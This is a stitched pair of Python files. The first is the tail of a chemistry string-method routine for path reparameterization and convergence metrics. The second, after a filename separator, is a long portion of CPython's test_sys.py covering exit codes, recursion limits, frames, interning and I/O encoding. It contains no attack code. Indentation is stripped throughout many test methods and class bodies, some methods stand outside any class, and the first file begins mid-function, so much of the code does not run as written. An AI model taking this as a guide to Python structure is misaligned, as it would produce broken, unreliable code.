            print(" h1dqmag, h2dqmag: %3.2f %3.2f" % (h1dqmag, h2dqmag))
        progress_gained[:TSnode] = dqmaga[:TSnode]/h1dqmag
        progress_gained[TSnode+1:] = dqmaga[TSnode+1:]/h2dqmag
        progress[:TSnode] = np.cumsum(progress_gained[:TSnode])
        progress[TSnode:] = np.cumsum(progress_gained[TSnode:])
    else:
        ictan, dqmaga = GSM.get_tangents(nodes)
        totaldqmag = np.sum(dqmaga)
        progress = np.cumsum(dqmaga)/totaldqmag
        progress_gained = dqmaga/totaldqmag
    print()

    if print_level > 0:
        print(" ideal progress gained per step", end=' ')
        for n in range(nnodes):
            print(" step [{}]: {:1.3f}".format(n, ideal_progress_gained[n]), end=' ')
        print()
        print(" original path progress ", end=' ')
        for n in range(nnodes):
            print(" step [{}]: {:1.3f}".format(n, orig_progress_gained[n]), end=' ')
        print()
        print(" reparameterized path progress ", end=' ')
        for n in range(nnodes):
            print(" step [{}]: {:1.3f}".format(n, progress_gained[n]), end=' ')
        print()
        print(" spacings (begin ic_reparam, steps", end=' ')
        for n in range(nnodes):
            print(" {:1.2}".format(orig_dqmaga[n]), end=' ')
        print()
        print(" spacings (end ic_reparam, steps: {}/{}):".format(i+1, ic_reparam_steps), end=' ')
        for n in range(nnodes):
            print(" {:1.2}".format(dqmaga[n]), end=' ')
        print("\n disprms: {:1.3}".format(disprms))
    return
# TODO move to string utils or delete altogether
#def get_current_rotation(self,frag,a1,a2):
# '''
# calculate current rotation for single-ended nodes
# '''
#
# # Get the information on fragment to rotate
# sa,ea,sp,ep = self.nodes[0].coord_obj.Prims.prim_only_block_info[frag]
#
# theta = 0.
# # Haven't added any nodes yet
# if self.nR==1:
# return theta
# for n in range(1,self.nR):
# xyz_frag = self.nodes[n].xyz[sa:ea].copy()
# axis = self.nodes[n].xyz[a2] - self.nodes[n].xyz[a1]
# axis /= np.linalg.norm(axis)
#
# # only want the fragment of interest
# reference_xyz = self.nodes[n-1].xyz.copy()
# # Turn off
# ref_axis = reference_xyz[a2] - reference_xyz[a1]
# ref_axis /= np.linalg.norm(ref_axis)
# # ALIGN previous and current node to get rotation around axis of rotation
# #print(' Rotating reference axis to current axis')
# I = np.eye(3)
# v = np.cross(ref_axis,axis)
# if v.all()==0.:
# print('Rotation is identity')
# R=I
# else:
# vx = np.array([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]])
# c = np.dot(ref_axis,axis)
# s = np.linalg.norm(v)
# R = I + vx + np.dot(vx,vx) * (1. - c)/(s**2)
# new_ref_axis = np.dot(ref_axis,R.T)
# #print(' overlap of ref-axis and axis (should be 1.) %1.2f' % np.dot(new_ref_axis,axis))
# new_ref_xyz = np.dot(reference_xyz,R.T)
#
# # Calculate dtheta
# ca = self.nodes[n].primitive_internal_coordinates[sp+3]
# cb = self.nodes[n].primitive_internal_coordinates[sp+4]
# cc = self.nodes[n].primitive_internal_coordinates[sp+5]
# dv12_a = ca.calcDiff(self.nodes[n].xyz,new_ref_xyz)
# dv12_b = cb.calcDiff(self.nodes[n].xyz,new_ref_xyz)
# dv12_c = cc.calcDiff(self.nodes[n].xyz,new_ref_xyz)
# dv12 = np.array([dv12_a,dv12_b,dv12_c])
# #print(dv12)
# dtheta = np.linalg.norm(dv12) #?
#
# dtheta = dtheta + np.pi % (2*np.pi) - np.pi
# theta += dtheta
# theta = theta/ca.w
# angle = theta * 180./np.pi
# print(angle)
# return theta
@staticmethod
def calc_optimization_metrics(nodes):
    '''
    Compute convergence metrics over the interior nodes of the string.

    Parameters
    ----------
    nodes : list of molecule-like objects; nodes[0] must expose ``natoms``
        and each interior node must expose ``gradrms`` (may be None for
        nodes that have not been grown yet).

    Returns
    -------
    (totalgrad, gradrms, sum_gradrms) :
        totalgrad  - sum of per-node gradrms scaled by sqrt(3N-6)
        gradrms    - RMS of the interior-node gradrms values
        sum_gradrms - plain sum of the interior-node gradrms values
    '''
    nnodes = len(nodes)
    # sqrt of the number of internal degrees of freedom, 3N-6.
    rn3m6 = np.sqrt(3*nodes[0].natoms-6)
    totalgrad = 0.0
    gradrms = 0.0
    sum_gradrms = 0.0
    for i, ico in enumerate(nodes[1:nnodes-1]):
        # Use identity comparison with None (was `ico != None`).
        if ico is not None:
            print(" node: {:02d} gradrms: {:.6f}".format(i, float(ico.gradrms)), end='')
            if i % 5 == 0:
                print()
            totalgrad += ico.gradrms*rn3m6
            gradrms += ico.gradrms*ico.gradrms
            sum_gradrms += ico.gradrms
    print('')
    # TODO wrong for growth
    gradrms = np.sqrt(gradrms/(nnodes-2))
    return totalgrad, gradrms, sum_gradrms
|
test_sys.py | import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ActiveExceptionTests(unittest.TestCase):
def test_exc_info_no_exception(self):
self.assertEqual(sys.exc_info(), (None, None, None))
def test_sys_exception_no_exception(self):
self.assertEqual(sys.exception(), None)
def test_exc_info_with_exception_instance(self):
def f():
raise ValueError(42)
try:
f()
except Exception as e_:
e = e_
exc_info = sys.exc_info()
self.assertIsInstance(e, ValueError)
self.assertIs(exc_info[0], ValueError)
self.assertIs(exc_info[1], e)
self.assertIs(exc_info[2], e.__traceback__)
def test_exc_info_with_exception_type(self):
def f():
raise ValueError
try:
f()
except Exception as e_:
e = e_
exc_info = sys.exc_info()
self.assertIsInstance(e, ValueError)
self.assertIs(exc_info[0], ValueError)
self.assertIs(exc_info[1], e)
self.assertIs(exc_info[2], e.__traceback__)
def test_sys_exception_with_exception_instance(self):
def f():
raise ValueError(42)
try:
f()
except Exception as e_:
e = e_
exc = sys.exception()
self.assertIsInstance(e, ValueError)
self.assertIs(exc, e)
def test_sys_exception_with_exception_type(self):
def f():
raise ValueError
try:
f()
except Exception as e_:
e = e_
exc = sys.exception()
self.assertIsInstance(e, ValueError)
self.assertIs(exc, e)
class ExceptHookTest(unittest.TestCase):
    """Behavior of sys.__excepthook__ and sys.excepthook."""

    def test_original_excepthook(self):
        try:
            raise ValueError(42)
        except ValueError as exc:
            with support.captured_stderr() as captured:
                sys.__excepthook__(*sys.exc_info())
        self.assertTrue(captured.getvalue().endswith("ValueError: 42\n"))

        # The hook cannot be called without the exception triple.
        self.assertRaises(TypeError, sys.__excepthook__)

    def test_excepthook_bytes_filename(self):
        # bpo-37467: sys.excepthook() must not crash if a filename
        # is a bytes string
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', BytesWarning)
            try:
                raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
            except SyntaxError as exc:
                with support.captured_stderr() as captured:
                    sys.__excepthook__(*sys.exc_info())

        report = captured.getvalue()
        self.assertIn(""" File "b'bytes_filename'", line 123\n""", report)
        self.assertIn(""" text\n""", report)
        self.assertTrue(report.endswith("SyntaxError: msg\n"))

    def test_excepthook(self):
        with test.support.captured_output("stderr") as stderr:
            # A non-exception "value" argument is reported, not raised.
            sys.excepthook(1, '1', 1)
        self.assertTrue("TypeError: print_exception(): Exception expected for " \
                        "value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
    # Don't leak child processes spawned by the subprocess-based tests
    # (same helper as test.support.reap_children; `support` is the
    # module-level alias imported at the top of this file).
    support.reap_children()
def test_exit(self):
    # Wrong arity: two positional arguments is a TypeError.
    self.assertRaises(TypeError, sys.exit, 42, 42)

    # No argument: the exit code defaults to None.
    with self.assertRaises(SystemExit) as ctx:
        sys.exit()
    self.assertIsNone(ctx.exception.code)

    rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
    self.assertEqual(rc, 0)
    self.assertEqual(out, b'')
    self.assertEqual(err, b'')

    # An integer argument is passed through unchanged.
    with self.assertRaises(SystemExit) as ctx:
        sys.exit(42)
    self.assertEqual(ctx.exception.code, 42)

    # A one-element tuple is unpacked to its sole entry.
    with self.assertRaises(SystemExit) as ctx:
        sys.exit((42,))
    self.assertEqual(ctx.exception.code, 42)

    # A string argument becomes the exit code verbatim.
    with self.assertRaises(SystemExit) as ctx:
        sys.exit("exit")
    self.assertEqual(ctx.exception.code, "exit")

    # A two-element tuple is kept as-is.
    with self.assertRaises(SystemExit) as ctx:
        sys.exit((17, 23))
    self.assertEqual(ctx.exception.code, (17, 23))

    # An uncaught SystemExit becomes the process exit status.
    rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
    self.assertEqual(rc, 47)
    self.assertEqual(out, b'')
    self.assertEqual(err, b'')

    def check_exit_message(code, expected, **env_vars):
        # Run `code` in a child interpreter and check the stderr prefix.
        rc, out, err = assert_python_failure('-c', code, **env_vars)
        self.assertEqual(rc, 1)
        self.assertEqual(out, b'')
        self.assertTrue(err.startswith(expected),
                        "%s doesn't start with %s" % (ascii(err), ascii(expected)))

    # The stderr buffer must be flushed before the exit message is written.
    check_exit_message(
        r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
        b"unflushed,message")

    # The exit message is written with the backslashreplace error handler.
    check_exit_message(
        r'import sys; sys.exit("surrogates:\uDCFF")',
        b"surrogates:\\udcff")

    # The message is encoded with the stderr encoding, not the default utf-8.
    check_exit_message(
        r'import sys; sys.exit("h\xe9")',
        b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
    # Exercise recovery after exhausting the recursion limit twice in a
    # row (Issue #5392); the exact call depth of this body matters, so it
    # must not be restructured.
    if hasattr(sys, 'gettrace') and sys.gettrace():
        self.skipTest('fatal error if run with a trace function')

    oldlimit = sys.getrecursionlimit()

    def f():
        # Unbounded recursion: must raise RecursionError, never crash.
        f()

    try:
        for depth in (50, 75, 100, 250, 1000):
            try:
                sys.setrecursionlimit(depth)
            except RecursionError:
                # Issue #25274: The recursion limit is too low at the
                # current recursion depth
                continue

            # Issue #5392: test stack overflow after hitting recursion
            # limit twice
            with self.assertRaises(RecursionError):
                f()
            with self.assertRaises(RecursionError):
                f()
    finally:
        sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
    # Issue #25274: Setting a low recursion limit must be blocked if the
    # current recursion depth is already higher than limit.

    from _testinternalcapi import get_recursion_depth

    def set_recursion_limit_at_depth(depth, limit):
        # Recurse until the interpreter reports the requested depth, then
        # try to set the (too low) limit there and expect RecursionError.
        recursion_depth = get_recursion_depth()
        if recursion_depth >= depth:
            with self.assertRaises(RecursionError) as cm:
                sys.setrecursionlimit(limit)
            self.assertRegex(str(cm.exception),
                             "cannot set the recursion limit to [0-9]+ "
                             "at the recursion depth [0-9]+: "
                             "the limit is too low")
        else:
            set_recursion_limit_at_depth(depth, limit)

    oldlimit = sys.getrecursionlimit()
    try:
        sys.setrecursionlimit(1000)
        for limit in (10, 25, 50, 75, 100, 150, 200):
            set_recursion_limit_at_depth(limit, limit)
    finally:
        # Always restore the interpreter-wide limit.
        sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
    # Raise SkipTest if sys doesn't have getwindowsversion attribute
    test.support.get_attribute(sys, "getwindowsversion")
    v = sys.getwindowsversion()
    self.assertEqual(len(v), 5)
    # First four tuple positions are ints, the fifth is the CSD string.
    for pos in range(4):
        self.assertIsInstance(v[pos], int)
    self.assertIsInstance(v[4], str)
    self.assertRaises(IndexError, operator.getitem, v, 5)
    self.assertIsInstance(v.service_pack, str)
    for field in ("major", "minor", "build", "platform",
                  "service_pack_minor", "service_pack_major",
                  "suite_mask", "product_type"):
        self.assertIsInstance(getattr(v, field), int)
    # Positional and named access must agree.
    for pos, field in enumerate(("major", "minor", "build",
                                 "platform", "service_pack")):
        self.assertEqual(v[pos], getattr(v, field))
    # This is how platform.py calls it. Make sure tuple
    # still has 5 elements
    maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
    # n here must be a global in order for this test to pass while
    # tracing with a python function. Tracing calls PyFrame_FastToLocals
    # which will add a copy of any locals to the frame object, causing
    # the reference count to increase by 2 instead of 1.
    global n
    # getrefcount() requires exactly one argument.
    self.assertRaises(TypeError, sys.getrefcount)
    c = sys.getrefcount(None)
    n = None
    # Binding one extra global reference bumps None's refcount by one.
    self.assertEqual(sys.getrefcount(None), c+1)
    del n
    self.assertEqual(sys.getrefcount(None), c)
    if hasattr(sys, "gettotalrefcount"):
        # Only debug builds expose the interpreter-wide total.
        self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
    # Depth must be a single int, and within the current stack.
    self.assertRaises(TypeError, sys._getframe, 42, 42)
    self.assertRaises(ValueError, sys._getframe, 2000000000)
    # The frame returned for depth 0 is the currently executing one.
    self.assertIs(sys._getframe().f_code,
                  SysModuleTest.test_getframe.__code__)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
    import threading
    import traceback

    # Spawn a thread that blocks at a known place. Then the main
    # thread does sys._current_frames(), and verifies that the frames
    # returned make sense.
    entered_g = threading.Event()
    leave_g = threading.Event()
    thread_info = []  # the thread's id

    def f123():
        g456()

    def g456():
        thread_info.append(threading.get_ident())
        entered_g.set()
        leave_g.wait()

    t = threading.Thread(target=f123)
    t.start()
    entered_g.wait()

    # At this point, t has finished its entered_g.set(), although it's
    # impossible to guess whether it's still on that line or has moved on
    # to its leave_g.wait().
    self.assertEqual(len(thread_info), 1)
    thread_id = thread_info[0]

    d = sys._current_frames()
    for tid in d:
        self.assertIsInstance(tid, int)
        self.assertGreater(tid, 0)

    main_id = threading.get_ident()
    self.assertIn(main_id, d)
    self.assertIn(thread_id, d)

    # Verify that the captured main-thread frame is _this_ frame.
    frame = d.pop(main_id)
    self.assertTrue(frame is sys._getframe())

    # Verify that the captured thread frame is blocked in g456, called
    # from f123. This is a little tricky, since various bits of
    # threading.py are also in the thread's call stack.
    frame = d.pop(thread_id)
    stack = traceback.extract_stack(frame)
    for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
        if funcname == "f123":
            break
    else:
        self.fail("didn't find f123() on thread's call stack")
    # NOTE: this compares against the literal source text of the helper
    # bodies above, so f123/g456 must not be reformatted.
    self.assertEqual(sourceline, "g456()")

    # And the next record must be for g456().
    filename, lineno, funcname, sourceline = stack[i+1]
    self.assertEqual(funcname, "g456")
    self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])

    # Reap the spawned thread.
    leave_g.set()
    t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
    import threading
    import traceback

    # Spawn a thread that blocks at a known place. Then the main
    # thread does sys._current_frames(), and verifies that the frames
    # returned make sense.
    entered_g = threading.Event()
    leave_g = threading.Event()
    thread_info = []  # the thread's id

    def f123():
        g456()

    def g456():
        thread_info.append(threading.get_ident())
        entered_g.set()
        while True:
            try:
                raise ValueError("oops")
            except ValueError:
                if leave_g.wait(timeout=support.LONG_TIMEOUT):
                    break

    t = threading.Thread(target=f123)
    t.start()
    entered_g.wait()

    # At this point, t has finished its entered_g.set(), although it's
    # impossible to guess whether it's still on that line or has moved on
    # to its leave_g.wait().
    self.assertEqual(len(thread_info), 1)
    thread_id = thread_info[0]

    d = sys._current_exceptions()
    for tid in d:
        self.assertIsInstance(tid, int)
        self.assertGreater(tid, 0)

    main_id = threading.get_ident()
    self.assertIn(main_id, d)
    self.assertIn(thread_id, d)
    # The main thread has no active exception here.
    self.assertEqual((None, None, None), d.pop(main_id))

    # Verify that the captured thread frame is blocked in g456, called
    # from f123. This is a little tricky, since various bits of
    # threading.py are also in the thread's call stack.
    exc_type, exc_value, exc_tb = d.pop(thread_id)
    stack = traceback.extract_stack(exc_tb.tb_frame)
    for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
        if funcname == "f123":
            break
    else:
        self.fail("didn't find f123() on thread's call stack")
    # NOTE: compares against the literal source text of the helpers above,
    # so f123/g456 must not be reformatted.
    self.assertEqual(sourceline, "g456()")

    # And the next record must be for g456().
    filename, lineno, funcname, sourceline = stack[i+1]
    self.assertEqual(funcname, "g456")
    self.assertTrue(sourceline.startswith("if leave_g.wait("))

    # Reap the spawned thread.
    leave_g.set()
    t.join()
def test_attributes(self):
    # Smoke-test the documented sys attributes: mostly type checks, since
    # the concrete values depend on the build and platform.
    self.assertIsInstance(sys.api_version, int)
    self.assertIsInstance(sys.argv, list)
    for arg in sys.argv:
        self.assertIsInstance(arg, str)
    self.assertIsInstance(sys.orig_argv, list)
    for arg in sys.orig_argv:
        self.assertIsInstance(arg, str)
    self.assertIn(sys.byteorder, ("little", "big"))
    self.assertIsInstance(sys.builtin_module_names, tuple)
    self.assertIsInstance(sys.copyright, str)
    self.assertIsInstance(sys.exec_prefix, str)
    self.assertIsInstance(sys.base_exec_prefix, str)
    self.assertIsInstance(sys.executable, str)
    self.assertEqual(len(sys.float_info), 11)
    self.assertEqual(sys.float_info.radix, 2)
    self.assertEqual(len(sys.int_info), 2)
    self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
    self.assertTrue(sys.int_info.sizeof_digit >= 1)
    self.assertEqual(type(sys.int_info.bits_per_digit), int)
    self.assertEqual(type(sys.int_info.sizeof_digit), int)
    self.assertIsInstance(sys.hexversion, int)

    self.assertEqual(len(sys.hash_info), 9)
    self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
    # sys.hash_info.modulus should be a prime; we do a quick
    # probable primality test (doesn't exclude the possibility of
    # a Carmichael number)
    for x in range(1, 100):
        self.assertEqual(
            pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
            1,
            "sys.hash_info.modulus {} is a non-prime".format(
                sys.hash_info.modulus)
            )
    self.assertIsInstance(sys.hash_info.inf, int)
    self.assertIsInstance(sys.hash_info.nan, int)
    self.assertIsInstance(sys.hash_info.imag, int)
    # Cross-check the runtime algorithm against the configure-time choice.
    algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
    if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
        self.assertIn(sys.hash_info.hash_bits, {32, 64})
        self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})

        if algo == 1:
            self.assertEqual(sys.hash_info.algorithm, "siphash24")
        elif algo == 2:
            self.assertEqual(sys.hash_info.algorithm, "fnv")
        elif algo == 3:
            self.assertEqual(sys.hash_info.algorithm, "siphash13")
        else:
            self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
    else:
        # PY_HASH_EXTERNAL
        self.assertEqual(algo, 0)
    self.assertGreaterEqual(sys.hash_info.cutoff, 0)
    self.assertLess(sys.hash_info.cutoff, 8)

    self.assertIsInstance(sys.maxsize, int)
    self.assertIsInstance(sys.maxunicode, int)
    self.assertEqual(sys.maxunicode, 0x10FFFF)
    self.assertIsInstance(sys.platform, str)
    self.assertIsInstance(sys.prefix, str)
    self.assertIsInstance(sys.base_prefix, str)
    self.assertIsInstance(sys.platlibdir, str)
    self.assertIsInstance(sys.version, str)
    # version_info must behave as both a 5-tuple and a named struct.
    vi = sys.version_info
    self.assertIsInstance(vi[:], tuple)
    self.assertEqual(len(vi), 5)
    self.assertIsInstance(vi[0], int)
    self.assertIsInstance(vi[1], int)
    self.assertIsInstance(vi[2], int)
    self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
    self.assertIsInstance(vi[4], int)
    self.assertIsInstance(vi.major, int)
    self.assertIsInstance(vi.minor, int)
    self.assertIsInstance(vi.micro, int)
    self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
    self.assertIsInstance(vi.serial, int)
    self.assertEqual(vi[0], vi.major)
    self.assertEqual(vi[1], vi.minor)
    self.assertEqual(vi[2], vi.micro)
    self.assertEqual(vi[3], vi.releaselevel)
    self.assertEqual(vi[4], vi.serial)
    self.assertTrue(vi > (1,0,0))
    self.assertIsInstance(sys.float_repr_style, str)
    self.assertIn(sys.float_repr_style, ('short', 'legacy'))
    if not sys.platform.startswith('win'):
        # POSIX builds expose the ABI flags suffix (e.g. "d" for debug).
        self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
    """sys.thread_info is a 3-field structseq with a known threading API name
    and lock implementation (or None when undetermined)."""
    info = sys.thread_info
    self.assertEqual(len(info), 3)
    self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
    self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
    """The real stdout and stderr streams must share the same encoding."""
    # Can't use sys.stdout, as this is a StringIO object when
    # the test runs under regrtest.
    self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
    """sys.intern() canonicalizes equal strings to one object and rejects
    str subclasses."""
    global INTERN_NUMRUNS
    # Make the test string unique across repeated runs (regrtest -R) so it
    # has genuinely never been interned before.
    INTERN_NUMRUNS += 1
    self.assertRaises(TypeError, sys.intern)
    s = "never interned before" + str(INTERN_NUMRUNS)
    self.assertTrue(sys.intern(s) is s)
    # swapcase().swapcase() builds an equal-but-distinct string object;
    # interning it must return the originally interned object.
    s2 = s.swapcase().swapcase()
    self.assertTrue(sys.intern(s2) is s)

    # Subclasses of string can't be interned, because they
    # provide too much opportunity for insane things to happen.
    # We don't want them in the interned dict and if they aren't
    # actually interned, we don't want to create the appearance
    # that they are by allowing intern() to succeed.
    class S(str):
        def __hash__(self):
            return 123

    self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
    """sys.flags exposes exactly the documented attributes with the right types."""
    self.assertTrue(sys.flags)
    attrs = ("debug",
             "inspect", "interactive", "optimize",
             "dont_write_bytecode", "no_user_site", "no_site",
             "ignore_environment", "verbose", "bytes_warning", "quiet",
             "hash_randomization", "isolated", "dev_mode", "utf8_mode",
             "warn_default_encoding")
    for attr in attrs:
        self.assertTrue(hasattr(sys.flags, attr), attr)
        # dev_mode is the only bool-valued flag; every other flag is an int.
        attr_type = bool if attr == "dev_mode" else int
        self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
    self.assertTrue(repr(sys.flags))
    self.assertEqual(len(sys.flags), len(attrs))
    self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
    """Assert the structseq type of *sys_attr* cannot be instantiated,
    neither by calling the type nor via __new__."""
    # Users are intentionally prevented from creating new instances of
    # sys.flags, sys.version_info, and sys.getwindowsversion.
    arg = sys_attr
    attr_type = type(sys_attr)
    with self.assertRaises(TypeError):
        attr_type(arg)
    with self.assertRaises(TypeError):
        attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
    """type(sys.flags) must not be instantiable by user code."""
    self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
    """type(sys.version_info) must not be instantiable by user code."""
    self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
    """type(sys.getwindowsversion()) must not be instantiable by user code."""
    # Skip if not being run on Windows.
    # get_attribute() raises unittest.SkipTest when the attribute is missing.
    test.support.get_attribute(sys, "getwindowsversion")
    self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
    """sys._clear_type_cache() must be callable without raising."""
    sys._clear_type_cache()
@support.requires_subprocess()
def test_ioencoding(self):
    """PYTHONIOENCODING ("encoding", "encoding:errors", ":errors") controls
    the stdio encoding and error handler of a child interpreter."""
    env = dict(os.environ)
    # Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
    # not representable in ASCII.
    env["PYTHONIOENCODING"] = "cp424"
    p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                         stdout=subprocess.PIPE, env=env)
    out = p.communicate()[0].strip()
    expected = ("\xa2" + os.linesep).encode("cp424")
    self.assertEqual(out, expected)

    # encoding:errors form: unencodable char is replaced with '?'
    env["PYTHONIOENCODING"] = "ascii:replace"
    p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                         stdout=subprocess.PIPE, env=env)
    out = p.communicate()[0].strip()
    self.assertEqual(out, b'?')

    # bare encoding: strict errors, so the child fails to print
    env["PYTHONIOENCODING"] = "ascii"
    p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                         env=env)
    out, err = p.communicate()
    self.assertEqual(out, b'')
    self.assertIn(b'UnicodeEncodeError:', err)
    self.assertIn(rb"'\xa2'", err)

    # trailing colon with empty errors behaves like the bare encoding
    env["PYTHONIOENCODING"] = "ascii:"
    p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                         env=env)
    out, err = p.communicate()
    self.assertEqual(out, b'')
    self.assertIn(b'UnicodeEncodeError:', err)
    self.assertIn(rb"'\xa2'", err)

    # errors-only form keeps the default encoding but changes the handler
    env["PYTHONIOENCODING"] = ":surrogateescape"
    p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
                         stdout=subprocess.PIPE, env=env)
    out = p.communicate()[0].strip()
    self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
                     'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
                     'requires FS encoding to match locale')
@support.requires_subprocess()
def test_ioencoding_nonascii(self):
    """An empty PYTHONIOENCODING keeps the locale encoding, so a non-ASCII
    character round-trips through a child's stdout."""
    env = dict(os.environ)
    env["PYTHONIOENCODING"] = ""
    p = subprocess.Popen([sys.executable, "-c",
                          'print(%a)' % os_helper.FS_NONASCII],
                         stdout=subprocess.PIPE, env=env)
    out = p.communicate()[0].strip()
    self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
                 'Test is not venv-compatible')
@support.requires_subprocess()
def test_executable(self):
    """sys.executable is an absolute path, and is empty in a child whose
    argv[0] cannot be resolved to a real program."""
    # sys.executable should be absolute
    self.assertEqual(os.path.abspath(sys.executable), sys.executable)

    # Issue #7774: Ensure that sys.executable is an empty string if argv[0]
    # has been set to a non existent program name and Python is unable to
    # retrieve the real program name
    # For a normal installation, it should work without 'cwd'
    # argument. For test runs in the build directory, see #7774.
    python_dir = os.path.dirname(os.path.realpath(sys.executable))
    p = subprocess.Popen(
        ["nonexistent", "-c",
         'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
        executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
    stdout = p.communicate()[0]
    executable = stdout.strip().decode("ASCII")
    p.wait()
    # Either empty (b'') or the real executable path, depending on the OS.
    self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
    """Verify *fs_encoding* names a real codec; if *expected* is given
    (truthy), it must also be exactly that name."""
    self.assertIsNotNone(fs_encoding)
    # An unknown codec name would make codecs.lookup() raise LookupError.
    codecs.lookup(fs_encoding)
